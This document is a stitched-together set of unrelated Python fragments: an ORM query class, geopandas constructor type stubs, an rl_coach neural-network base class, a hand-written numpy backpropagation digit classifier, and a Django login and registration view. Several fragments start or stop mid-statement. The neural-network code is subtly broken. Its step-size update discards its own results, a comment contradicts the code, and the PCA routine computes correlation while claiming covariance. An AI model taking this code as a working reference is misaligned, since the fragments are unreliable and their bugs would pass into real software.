if self._for_update and self.database.adapter.for_update_support:
pieces.append('FOR UPDATE')
return ' '.join(pieces), params, query_meta
def sql(self):
query, params, meta = self.sql_meta()
return query, params
def execute(self):
if self._dirty or not self._qr:
try:
sql, params, meta = self.sql_meta()
except EmptyResultException:
return []
else:
if self._naive:
meta = None
self._qr = QueryResultWrapper(self.model, self.raw_execute(sql, params), meta)
self._dirty = False
return self._qr
else:
# call the __iter__ method directly
return self._qr
def __iter__(self):
return iter(self.execute())
class UpdateQuery(BaseQuery):
def __init__(self, _model, | |
__init__(self, /, data: pandas.core.series.Series):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["value1", "geometry"], Union[shapely.geometry.point.Point, int]
]
],
columns: List[Literal["geometry", "value1"]],
):
"""
usage.geopandas: 2
"""
...
@overload
def __init__(
self,
/,
data: Dict[Literal["geometry"], geopandas.geoseries.GeoSeries],
index: pandas.core.indexes.range.RangeIndex,
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[Literal["FID", "geometry"], Union[shapely.geometry.point.Point, int]]
],
columns: List[Literal["geometry", "FID"]],
):
"""
usage.geopandas: 2
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["value1", "index", "geometry"],
Union[shapely.geometry.point.Point, int],
]
],
columns: List[Literal["geometry", "value1", "index"]],
):
"""
usage.geopandas: 2
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[Literal["index", "geometry"], Union[shapely.geometry.point.Point, int]]
],
columns: List[Literal["geometry", "index"]],
):
"""
usage.geopandas: 2
"""
...
@overload
def __init__(
self,
/,
data: Dict[Literal["geometry"], geopandas.geoseries.GeoSeries],
index: pandas.core.indexes.numeric.Int64Index,
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["value1", "foo_index", "geometry"],
Union[shapely.geometry.point.Point, int],
]
],
columns: List[Literal["geometry", "value1", "foo_index"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["foo_index", "geometry"],
Union[shapely.geometry.point.Point, int],
]
],
columns: List[Literal["geometry", "foo_index"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(self, /, data: geopandas.geodataframe.GeoDataFrame):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["value3", "value2", "value1", "geometry"],
Union[shapely.geometry.point.Point, int],
]
],
columns: List[Literal["geometry", "value3", "value2", "value1"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: Dict[Literal["geometry"], geopandas.geoseries.GeoSeries],
index: pandas.core.indexes.multi.MultiIndex,
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["value2", "value1", "geometry"],
Union[shapely.geometry.point.Point, int],
]
],
columns: List[Literal["geometry", "value2", "value1"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["value3", "geometry"], Union[shapely.geometry.point.Point, int]
]
],
columns: List[Literal["geometry", "value3"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["value3", "level_1", "first", "geometry"],
Union[shapely.geometry.point.Point, int],
]
],
columns: List[Literal["geometry", "value3", "level_1", "first"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["level_1", "first", "geometry"],
Union[shapely.geometry.point.Point, int],
]
],
columns: List[Literal["geometry", "level_1", "first"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["value3", "level_1", "level_0", "geometry"],
Union[shapely.geometry.point.Point, int],
]
],
columns: List[Literal["geometry", "value3", "level_1", "level_0"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["level_1", "level_0", "geometry"],
Union[shapely.geometry.point.Point, int],
]
],
columns: List[Literal["geometry", "level_1", "level_0"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["value1", "index", "geometry"],
Union[shapely.geometry.point.Point, float, int],
]
],
columns: List[Literal["geometry", "value1", "index"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: Dict[Literal["geometry"], geopandas.geoseries.GeoSeries],
index: pandas.core.indexes.numeric.Float64Index,
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["index", "geometry"], Union[shapely.geometry.point.Point, float]
]
],
columns: List[Literal["geometry", "index"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["value1", "centile", "geometry"],
Union[shapely.geometry.point.Point, float, int],
]
],
columns: List[Literal["geometry", "value1", "centile"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["centile", "geometry"],
Union[shapely.geometry.point.Point, float],
]
],
columns: List[Literal["geometry", "centile"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["value1", "index", "geometry"],
Union[str, shapely.geometry.point.Point, int],
]
],
columns: List[Literal["geometry", "value1", "index"]],
):
"""
usage.geopandas: 3
"""
...
@overload
def __init__(
self,
/,
data: Dict[Literal["geometry"], geopandas.geoseries.GeoSeries],
index: pandas.core.indexes.base.Index,
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[Literal["index", "geometry"], Union[shapely.geometry.point.Point, str]]
],
columns: List[Literal["geometry", "index"]],
):
"""
usage.geopandas: 3
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["value1", "datetime", "geometry"],
Union[str, shapely.geometry.point.Point, int],
]
],
columns: List[Literal["geometry", "value1", "datetime"]],
):
"""
usage.geopandas: 2
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["datetime", "geometry"],
Union[shapely.geometry.point.Point, str],
]
],
columns: List[Literal["geometry", "datetime"]],
):
"""
usage.geopandas: 2
"""
...
@overload
def __init__(
self,
/,
data: List[Dict[Literal["geometry"], shapely.geometry.point.Point]],
columns: List[Literal["geometry"]],
):
"""
usage.geopandas: 2
"""
...
@overload
def __init__(
self,
/,
data: Dict[Literal["geometry"], geopandas.geoseries.GeoSeries],
index: pandas.core.indexes.datetimes.DatetimeIndex,
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["a", "geometry"],
Union[shapely.geometry.multipoint.MultiPoint, int],
]
],
columns: List[Literal["geometry", "a"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["a", "geometry"],
Union[
shapely.geometry.multipoint.MultiPoint,
int,
shapely.geometry.point.Point,
],
]
],
columns: List[Literal["geometry", "a"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["a", "geometry"],
Union[shapely.geometry.linestring.LineString, int],
]
],
columns: List[Literal["geometry", "a"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["a", "geometry"],
Union[shapely.geometry.multilinestring.MultiLineString, int],
]
],
columns: List[Literal["geometry", "a"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["a", "geometry"],
Union[
shapely.geometry.multilinestring.MultiLineString,
int,
shapely.geometry.linestring.LineString,
],
]
],
columns: List[Literal["geometry", "a"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["a", "geometry"],
Union[shapely.geometry.multipolygon.MultiPolygon, int],
]
],
columns: List[Literal["geometry", "a"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["a", "geometry"],
Union[
shapely.geometry.multipolygon.MultiPolygon,
int,
shapely.geometry.polygon.Polygon,
],
]
],
columns: List[Literal["geometry", "a"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["a", "geometry"], Union[None, int, shapely.geometry.point.Point]
]
],
columns: List[Literal["geometry", "a"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[Dict[Literal["a", "geometry"], Union[None, int]]],
columns: List[Literal["geometry", "a"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[Dict[Literal["a", "geometry"], object]],
columns: List[Literal["geometry", "a"]],
):
"""
usage.geopandas: 2
"""
...
@overload
def __init__(
self,
/,
data: Dict[
Literal["value2", "value1", "geometry"],
Union[numpy.ndarray, geopandas.array.GeometryArray],
],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: Dict[
Literal["geometry", "data"], Union[geopandas.geoseries.GeoSeries, List[int]]
],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[shapely.geometry.point.Point],
columns: List[Literal["geom"]],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: Dict[
Literal["geometry", "col1"], Union[geopandas.array.GeometryArray, List[int]]
],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(self, /, data: Dict[Literal["geometry"], List[int]]):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self, /, data: geopandas.geoseries.GeoSeries, columns: List[Literal["col1"]]
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(self, /, data: Dict[Literal["col1"], geopandas.array.GeometryArray]):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(self, /, data: Dict[Literal["col1"], geopandas.geoseries.GeoSeries]):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(self, /, data: Dict[Literal["col2"], geopandas.geoseries.GeoSeries]):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(self, /, data: list):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(self, /, data: Dict[Literal["col1"], List[int]]):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(self, /, data: geopandas.geoseries.GeoSeries):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self, /, data: collections.defaultdict, index: List[Literal["b", "a"]]
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(self, /, data: collections.defaultdict, index: List[int]):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: Dict[
Literal["location", "B", "A"],
Union[List[shapely.geometry.point.Point], range],
],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: Dict[
Literal["geometry", "location", "B", "A"],
Union[List[shapely.geometry.point.Point], range],
],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: Dict[
Literal["geometry", "B", "A"],
Union[List[shapely.geometry.point.Point], numpy.ndarray, range],
],
):
"""
usage.geopandas: 2
"""
...
@overload
def __init__(
self,
/,
data: Dict[
Literal["geometry", "other_geom", "B", "A"],
Union[List[shapely.geometry.point.Point], range, numpy.ndarray],
],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["Shape_Area", "Shape_Leng", "BoroName", "BoroCode", "geometry"],
Union[
Literal[
"Staten Island", "Queens", "Brooklyn", "Manhattan", "Bronx"
],
shapely.geometry.multipolygon.MultiPolygon,
int,
float,
],
]
],
columns: None,
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["b", "geometry", "a"], Union[shapely.geometry.point.Point, int]
]
],
columns: None,
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[Literal["a", "geometry"], Union[shapely.geometry.point.Point, int]]
],
columns: None,
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: List[
Dict[
Literal["name", "lon", "lat", "geometry"],
Union[shapely.geometry.point.Point, float, Literal["a", "b", "c"]],
]
],
columns: None,
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: Dict[
Literal["geom", "values"], List[Union[int, shapely.geometry.point.Point]]
],
):
"""
usage.geopandas: 1
"""
...
@overload
def __init__(
self,
/,
data: | |
<gh_stars>1000+
#
# Copyright (c) 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from typing import Any, Dict, List, Tuple
import numpy as np
from rl_coach.base_parameters import AgentParameters
from rl_coach.saver import SaverCollection
from rl_coach.spaces import SpacesDefinition
class Architecture(object):
@staticmethod
def construct(variable_scope: str, devices: List[str], *args, **kwargs) -> 'Architecture':
"""
Construct a network class using the provided variable scope and on requested devices
:param variable_scope: string specifying variable scope under which to create network variables
:param devices: list of devices (can be list of Device objects, or string for TF distributed)
:param args: all other arguments for class initializer
:param kwargs: all other keyword arguments for class initializer
:return: an object which is a child of Architecture
"""
raise NotImplementedError
def __init__(self, agent_parameters: AgentParameters, spaces: SpacesDefinition, name: str= ""):
"""
Creates a neural network 'architecture', that can be trained and used for inference.
:param agent_parameters: the agent parameters
:param spaces: the spaces (observation, action, etc.) definition of the agent
:param name: the name of the network
"""
self.spaces = spaces
self.name = name
self.network_wrapper_name = self.name.split('/')[0] # e.g. 'main/online' --> 'main'
self.full_name = "{}/{}".format(agent_parameters.full_name_id, name)
self.network_parameters = agent_parameters.network_wrappers[self.network_wrapper_name]
self.batch_size = self.network_parameters.batch_size
self.learning_rate = self.network_parameters.learning_rate
self.optimizer = None
self.ap = agent_parameters
def predict(self,
inputs: Dict[str, np.ndarray],
outputs: List[Any] = None,
squeeze_output: bool = True,
initial_feed_dict: Dict[Any, np.ndarray] = None) -> Tuple[np.ndarray, ...]:
"""
Given input observations, use the model to make predictions (e.g. action or value).
:param inputs: current state (i.e. observations, measurements, goals, etc.)
(e.g. `{'observation': numpy.ndarray}` of shape (batch_size, observation_space_size))
:param outputs: list of outputs to return. Return all outputs if unspecified. Type of the list elements
depends on the framework backend.
:param squeeze_output: call squeeze_list on output before returning if True
:param initial_feed_dict: a dictionary of extra inputs for forward pass.
:return: predictions of action or value of shape (batch_size, action_space_size) for action predictions)
"""
raise NotImplementedError
@staticmethod
def parallel_predict(sess: Any,
network_input_tuples: List[Tuple['Architecture', Dict[str, np.ndarray]]]) -> \
Tuple[np.ndarray, ...]:
"""
:param sess: active session to use for prediction
:param network_input_tuples: tuple of network and corresponding input
:return: list or tuple of outputs from all networks
"""
raise NotImplementedError
def train_on_batch(self,
inputs: Dict[str, np.ndarray],
targets: List[np.ndarray],
scaler: float=1.,
additional_fetches: list=None,
importance_weights: np.ndarray=None) -> Tuple[float, List[float], float, list]:
"""
Given a batch of inputs (e.g. states) and targets (e.g. discounted rewards), takes a training step: i.e. runs a
forward pass and backward pass of the network, accumulates the gradients and applies an optimization step to
update the weights.
Calls `accumulate_gradients` followed by `apply_and_reset_gradients`.
Note: Currently an unused method.
:param inputs: typically the environment states (but can also contain other data necessary for loss).
(e.g. `{'observation': numpy.ndarray}` with `observation` of shape (batch_size, observation_space_size) or
(batch_size, observation_space_size, stack_size) or
`{'observation': numpy.ndarray, 'output_0_0': numpy.ndarray}` with `output_0_0` of shape (batch_size,))
:param targets: target values of shape (batch_size, ). For example discounted rewards for value network
for calculating the value-network loss would be a target. Length of list and order of arrays in
the list matches that of network losses which are defined by network parameters
:param scaler: value to scale gradients by before optimizing network weights
:param additional_fetches: list of additional values to fetch and return. The type of each list
element is framework dependent.
:param importance_weights: ndarray of shape (batch_size,) to multiply with batch loss.
:return: tuple of total_loss, losses, norm_unclipped_grads, fetched_tensors
total_loss (float): sum of all head losses
losses (list of float): list of all losses. The order is list of target losses followed by list
of regularization losses. The specifics of losses is dependant on the network parameters
(number of heads, etc.)
norm_unclippsed_grads (float): global norm of all gradients before any gradient clipping is applied
fetched_tensors: all values for additional_fetches
"""
raise NotImplementedError
def get_weights(self) -> List[np.ndarray]:
"""
Gets model weights as a list of ndarrays. It is used for synchronizing weight between two identical networks.
:return: list weights as ndarray
"""
raise NotImplementedError
def set_weights(self, weights: List[np.ndarray], rate: float=1.0) -> None:
"""
Sets model weights for provided layer parameters.
:param weights: list of model weights in the same order as received in get_weights
:param rate: controls the mixture of given weight values versus old weight values.
i.e. new_weight = rate * given_weight + (1 - rate) * old_weight
:return: None
"""
raise NotImplementedError
def reset_accumulated_gradients(self) -> None:
"""
Sets gradient of all parameters to 0.
Once gradients are reset, they must be accessible by `accumulated_gradients` property of this class,
which must return a list of numpy ndarrays. Child class must ensure that `accumulated_gradients` is set.
"""
raise NotImplementedError
def accumulate_gradients(self,
inputs: Dict[str, np.ndarray],
targets: List[np.ndarray],
additional_fetches: list=None,
importance_weights: np.ndarray=None,
no_accumulation: bool=False) -> Tuple[float, List[float], float, list]:
"""
Given a batch of inputs (i.e. states) and targets (e.g. discounted rewards), computes and accumulates the
gradients for model parameters. Will run forward and backward pass to compute gradients, clip the gradient
values if required and then accumulate gradients from all learners. It does not update the model weights,
that's performed in `apply_and_reset_gradients` method.
Once gradients are accumulated, they are accessed by `accumulated_gradients` property of this class.å
:param inputs: typically the environment states (but can also contain other data for loss)
(e.g. `{'observation': numpy.ndarray}` with `observation` of shape (batch_size, observation_space_size) or
(batch_size, observation_space_size, stack_size) or
`{'observation': numpy.ndarray, 'output_0_0': numpy.ndarray}` with `output_0_0` of shape (batch_size,))
:param targets: targets for calculating loss. For example discounted rewards for value network
for calculating the value-network loss would be a target. Length of list and order of arrays in
the list matches that of network losses which are defined by network parameters
:param additional_fetches: list of additional values to fetch and return. The type of each list
element is framework dependent.
:param importance_weights: ndarray of shape (batch_size,) to multiply with batch loss.
:param no_accumulation: if True, set gradient values to the new gradients, otherwise sum with previously
calculated gradients
:return: tuple of total_loss, losses, norm_unclipped_grads, fetched_tensors
total_loss (float): sum of all head losses
losses (list of float): list of all losses. The order is list of target losses followed by list of
regularization losses. The specifics of losses is dependant on the network parameters
(number of heads, etc.)
norm_unclippsed_grads (float): global norm of all gradients before any gradient clipping is applied
fetched_tensors: all values for additional_fetches
"""
raise NotImplementedError
def apply_and_reset_gradients(self, gradients: List[np.ndarray], scaler: float=1.) -> None:
"""
Applies the given gradients to the network weights and resets the gradient accumulations.
Has the same impact as calling `apply_gradients`, then `reset_accumulated_gradients`.
:param gradients: gradients for the parameter weights, taken from `accumulated_gradients` property
of an identical network (either self or another identical network)
:param scaler: A scaling factor that allows rescaling the gradients before applying them
"""
raise NotImplementedError
def apply_gradients(self, gradients: List[np.ndarray], scaler: float=1.) -> None:
"""
Applies the given gradients to the network weights.
Will be performed sync or async depending on `network_parameters.async_training`
:param gradients: gradients for the parameter weights, taken from `accumulated_gradients` property
of an identical network (either self or another identical network)
:param scaler: A scaling factor that allows rescaling the gradients before applying them
"""
raise NotImplementedError
def get_variable_value(self, variable: Any) -> np.ndarray:
"""
Gets value of a specified variable. Type of variable is dependant on the framework.
Example of a variable is head.kl_coefficient, which could be a symbol for evaluation
or could be a string representing the value.
:param variable: variable of interest
:return: value of the specified variable
| |
<gh_stars>0
#!/usr/bin/python
# imported libraries
import gzip as gz
import numpy as np
import matplotlib.pyplot as plt
# digt data function 1 of 2
def seperate_data(filename):
'''name: seperate_data
description:
dependencies:
inputs:
outputs:
'''
# get data from the file
with gz.open(filename) as f:
data = np.loadtxt(f)
# seperate observations from labels
X = data[:,1:]
y = data[:,0]
# return the data
return X, y
# digt data function 2 of 2
def vectorize_digit_labels(labels):
'''name: vectorize_digit_labels
description: function vectorizes the labels of digits (0-9), for example:
0 == [1,0,0,0,0,0,0,0,0,0]
.
.
.
5 == [0,0,0,0,0,1,0,0,0,0]
.
.
.
9 == [0,0,0,0,0,0,0,0,0,1]
dependencies: none
inputs: labels - N x 1 vector of digit (0-9) labels
outputs: labels_vectorized - N x 10 matrix of vectorized digits
'''
# get number of samples and number of unique labels
samples = labels.shape[0]
num_unique = np.unique(labels).shape[0]
# create a matrix of unique vectos corresponding to unique labels
unique_labels_vectorized = np.eye(num_unique)
# create an empty matrix to store vectorized labels
labels_vectorized = np.empty((samples, num_unique))
# get vectorized version of labe for each sample
for sample_idx in range(samples):
# using label as index, because labels are digits (0-9)
label_idx = labels[sample_idx].astype(int)
# adding vectorized version to matrix of labels
labels_vectorized[sample_idx] = unique_labels_vectorized[label_idx,:]
# return vectorized labels
return labels_vectorized
# dimension reduction function
def pca(data, k_features):
'''name: pca
description: function takes an original data set an makes the following transformations:
the data is centered about the origin; the covariance is then calculated;
the eigenvalues and eigenvectors of the covariance are found;
the original data is the projected onto the k eigenvectors in descending order
of their eigenvalues, creating a new N x K matrix of k principal components
dependencies: none
inputs: data - is an N x K matrix with the rows representing observations and columns representing features
k_features - is an integer representing the number of principal components or features to keep
outputs: reduced_data - an N x k_features matrix
'''
# check 0 < k_features <= number of features
if k_features > 0 and k_features <= data.shape[1]:
# center the data and calculate the covariance matrix (sigma)
sigma = np.corrcoef(data.T)
# get the eigenvectors of sigma
eigen_vecs, _, _ = np.linalg.svd(sigma)
# create an empty matrix to hold dimensionally reduced data
reduced_data = np.empty((data.shape[0], k_features))
# for each observation x, project x onto eigenvectors
for observation_idx in range(data.shape[0]):
reduced_data[observation_idx] = np.dot(eigen_vecs[:,:k_features].T, data[observation_idx,:][:,np.newaxis])[:,np.newaxis].T
# return dimensionally reduced data
return reduced_data
# print error message
print ('ERROR: 0 < k_features < %i') % data.shape[1]
# learning rate function
def delta_bar_delta(gamma, nabla_E, delta, up=0.1, down=0.1, phi=0.01):
'''name: delta_bar_delta
description: step size (gamma) is increased whenever the algorithm proceeds down the error function
step size (gamma) is decreased when the algorithm jumps over a valley of the error function
dependencies: none
inputs: gamma - vector of step sizes
nabla_E - matrix of gradient errors
delta - vector of exponentially averaged partial derivative in the direction of weight
outputs: gamma - vector of step sizes
delta_new - updated delta
'''
# caculate sum of gradient error
nabla_E_sum = np.sum(nabla_E, axis=1)[:,np.newaxis]
# caculate new delta
delta_new = (1 - phi) * nabla_E_sum + phi * delta
# update each gamma
for idx in range(gamma.shape[0]):
# if gradient is on same side, from previous, increase the step size
if nabla_E_sum[idx] * delta[idx] > 0: gamma[idx] + up
# if gradient is on opposite side, form previous, increase the step size
elif nabla_E_sum[idx] * delta[idx] < 0: gamma[idx] * down
# otherwise do nothing
else: pass
# return modified gamma and new delta
return gamma, delta_new
# neural network function
def single_hidden_train(data, labels, num_features=None, k_units=20, iterations=1000, output_graph=False):
'''name: single_hidden_train
description: function learns the weights of a single hidden layer neural network
using a back propagation algorithm defined as:
1. Feed-forward computation
2. Backpropagation to the output layer
3. Backpropagation to the hidden layer
4. Weight updates using gradient descent
in addition, the function dispalys a plot of the error verses the number of
iterations; at this point the user may decide to continue the training or
exit the function
dependencies: delta_bar_delta
inputs: data - an N x K matrix with the rows representing observations and columns representing features
labels - matrix of vectorized labels
num_features - PCA is used to reduce the number of features, by default data is not reduced
k_units - number of hidden units
iterations - number of times the weights are updated
output_graph - allows user to perform another round of iterations based on a graph of the error
outputs: W_1 - trained weights for input layer
W_2 - trained weights for output of hidden layer
error_rate - final error rate of training data
'''
# check if dimensionality is to be reduced
if num_features: data = pca(data, num_features)
# get number of samples, features, and outputs
x_samples = data.shape[0]
n_features = data.shape[1]
m_outputs = labels.shape[1]
# intialize initial vectors of weights, with bias term added to last row
W_1_bar = np.random.uniform(0.01, 0.1, (n_features + 1, k_units)) # (N + 1) x K
W_2_bar = np.random.uniform(0.01, 0.1, (k_units + 1, m_outputs)) # (K + 1) x M
# define node functions sigmoid and sigmoid_prime
sigmoid = lambda vec_x: 1 / (1 + np.exp(-vec_x))
sigmoid_prime = lambda vec_x: sigmoid(vec_x) * (1 - sigmoid(vec_x))
# define error function
error_func = lambda vec_e: 0.5 * vec_e**2
# define initial gradient step sizes and deltas to be used in delta_bar_delta
gamma_1 = np.random.uniform(0.01, 0.1, (k_units, 1)) # K x 1
bar_delta_1 = np.zeros((k_units, 1)) # K x 1
gamma_2 = np.random.uniform(0.01, 0.1, (m_outputs, 1)) # M x 1
bar_delta_2 = np.zeros((m_outputs, 1)) # M x 1
# define offset and create arrays to store sample error & sum of errors
offset = 0
sample_error = np.zeros((x_samples,1))
sum_of_errors = np.zeros((iterations,1))
# while user chooses to continue
iterate = True
while iterate:
# iterate for specified number of steps
for iteration in range(iterations):
# loop through each sample
for sample_idx in range(x_samples):
# --------------------------------------------------------------------------------
# step one: feed-forward computation
# --------------------------------------------------------------------------------
# get input vector which, for consistancy, we will call output_0 and add bias term
output_0 = data[sample_idx,:][np.newaxis,:] # 1 x N
output_0_hat = np.hstack((output_0, np.ones((1, 1)))) # 1 x (N + 1)
# caculate output_1 and add bias term
output_1 = sigmoid(np.dot(output_0_hat, W_1_bar)) # 1 x K
output_1_hat = np.hstack((output_1, np.ones((1, 1)))) # 1 x (K + 1)
# caculate output_2 and convert to vectorized label
output_2 = sigmoid(np.dot(output_1_hat, W_2_bar)) # 1 x M
new_output_2 = np.zeros(output_2.shape)
new_output_2[:,np.argmax(output_2)] = 1
# caculate derivatives of output_1 and output_2 and store in diagonal matrices
D_1 = np.diagflat(sigmoid_prime(np.dot(output_0_hat, W_1_bar))) # K x K
D_2 = np.diagflat(sigmoid_prime(np.dot(output_1_hat, W_2_bar))) # M x M
# caculate difference in error
error_diff = new_output_2 - labels[sample_idx,:][np.newaxis,:] # 1 x M
# caculate sum of the sample's error
sample_error[sample_idx] = np.sum(error_func(error_diff))
# --------------------------------------------------------------------------------
# step two: backpropagation to the output layer
# --------------------------------------------------------------------------------
# define backpropagated error of output layer
delta_2 = np.dot(D_2, error_diff.T) # M x 1
# define error gradient of output layer
nabla_E_2 = np.dot(delta_2, output_1_hat) # M x (K + 1)
# --------------------------------------------------------------------------------
# step three: backpropagation to the hidden layer
# --------------------------------------------------------------------------------
# define backpropagated error of hidden layer
delta_1 = np.dot(D_1, np.dot(W_2_bar[:-1,:], delta_2)) # K x 1
# define error gradient of hidden layer
nabla_E_1 = np.dot(delta_1, output_0_hat) # K x (N + 1)
# --------------------------------------------------------------------------------
# step four: weight updates
# --------------------------------------------------------------------------------
# get gamma_1 and gamma_2 using delta-bar-delta
gamma_1, bar_delta_1 = delta_bar_delta(gamma_1, nabla_E_1, bar_delta_1)
gamma_2, bar_delta_2 = delta_bar_delta(gamma_2, nabla_E_2, bar_delta_2)
# update weights
W_1_bar += (-gamma_1 | |
from django.contrib import auth
from .models import *
from django.shortcuts import render, redirect, get_object_or_404
from sitio.forms import FormCreateUser, FormLogin, FormCreateArticle, FormCreateComment
from django.contrib.auth.models import User, Group
from django.contrib.auth.decorators import login_required
from django.contrib.auth import authenticate, login
from django.core.mail import EmailMessage
from django.template.loader import render_to_string
from django.conf import settings
from django.contrib import messages
from django.views.generic import View
from django.http import JsonResponse
from datetime import date, datetime
from haystack.generic_views import SearchView
from django.db.models import Q
## TOKEN AUTH USER
from django.utils.http import urlsafe_base64_decode, urlsafe_base64_encode
from django.utils.encoding import force_bytes, force_text
from django.contrib.sites.shortcuts import get_current_site
from django.urls import reverse
from .tokenizer import token_generator
def home(request): #Pagina principal
articles = Article.objects.order_by("-date_created")[:10]
content = {}
sender = []
for article in articles:
content = {
'title': article.title,
'date_created': article.date_created,
'link': '/articulo/' + str(article.id),
'user': article.user,
'image': article.image_one.url,
}
sender.append(content)
return render(request, 'home.html', {'articles': sender})
def logear(request): #Logeo de usuarios ya creados
if not request.user.is_authenticated: # Check if its ok
form = FormLogin()
no_activo = False
mensajes = []
if request.method == "POST":
form = FormLogin(data=request.POST)
if form.is_valid():
username = form.cleaned_data['username']
password = form.cleaned_data['password']
user = authenticate(username=username, password=password)
if user is not None:
if user.is_active:
auth.login(request, user)
next = request.POST.get('next')
if next:
return redirect(request.POST.get('next'))
return redirect('homepage')
else:
username = form.cleaned_data['username']
usuarios_comunes = User.objects.all()
usuario_encontrado = False
for usr in usuarios_comunes:
if (usr.username == username):
usuario_encontrado = True
break
if (usuario_encontrado):
if (not usr.is_active):
mensajes.append('El usuario no está activo, verifique su email')
else:
mensajes.append('La contraseña ingresada es incorrecta')
else:
msj = 'El usuario "' + username + '" no existe'
mensajes.append(msj)
context = {'form': form, 'messages': mensajes}
return render(request, "login.html", context)
else:
return redirect('homepage')
def crear_usuario(request): #Registro de nuevo usuario
if not request.user.is_authenticated: # Check if its ok
mensajes = []
if request.method == "POST":
form = FormCreateUser(data=request.POST)
if form.is_valid():
validar_mail = request.POST['email']
lista_usuarios = User.objects.all() #Se trae todos los usuarios que haya para validar mail existente
email_valido = True
for u in lista_usuarios:
if u.email == validar_mail:
email_valido = False
break
if email_valido:
user = form.save()
user.is_active = False
grupo = Group.objects.get(name = 'comun')
user.groups.add(grupo)
Profile.objects.create(
user = user
)
uidb64 = urlsafe_base64_encode(force_bytes(user.pk))
domain = get_current_site(request).domain
link = reverse('activate',kwargs={'uidb64':uidb64,'token':token_generator.make_token(user)})
activate_url = 'http://'+domain+link
user.save()
email = EmailMessage(
'Hola ' +user.username+ '! Gracias por registrarte!',
'Activa tu cuenta mediante este link: '+ activate_url,
'<EMAIL>',
[user.email]
)
email.send(fail_silently=False)
return redirect('login')
else:
mensajes.append('El mail ingresado ya existe')
form = FormCreateUser(data=request.POST)
else:
form = FormCreateUser(data=request.POST)
else:
